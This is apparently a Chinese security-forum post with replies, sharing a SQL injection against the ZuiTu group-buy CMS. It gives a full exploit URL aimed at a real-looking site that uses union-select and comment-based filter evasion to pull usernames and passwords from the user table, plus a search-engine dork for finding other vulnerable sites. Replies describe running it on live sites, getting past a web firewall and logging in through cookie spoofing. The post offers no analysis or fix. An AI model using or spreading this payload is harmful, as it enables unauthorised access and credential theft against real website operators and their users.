最土团购 注入 好久的了
直接来代码,你们就知道了。代码不分析了。,今天好累呀!
[url]http://tao.mphone.cc/api/call.php?action=query&num=j8g'%29/[/url]**/union/**/select/**/1,2,3,concat(0x7e,0x27,username,0x7e,0x27,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23
关键字百度 Powered by ZuiTu software.
评论20次
这波简单粗暴的操作 贼溜
正好遇到个 测试下
这算是漏点不~
测试了一个站,成功,安全狗拦的from关键字,密码没破出来,直接cookie欺骗进前台了,本想pass掉密码后台二次登录,但现在貌似加了先输入前台密码功能,还在研究中……
这个在创宇的微博上看到过
给力。 收藏了
xi望多一点代码分析类的文章 谢谢分享!!
测试失败
很简单的结果!
一般都改后台了
我也不知道,我就分析了下,结果就出来了。。。
貌似没xi望,lz另辟蹊径吧,或许其他方法可以突破,社工啥的
可以
这样文章不错攻防兼备啊
刚试试了十多个站,不行哦
url漏点了。
试了一个,被安全狗提示
好给力啊,刚好 我客户有用,测试秒之 赶快修复
忘记了,原来在哪看到过这个cms的0day,90和t00ls都翻了下,没有找到,应该就在这两个论坛了,楼主知道不?给个url吧
之前在微博上面看到了创宇发了一个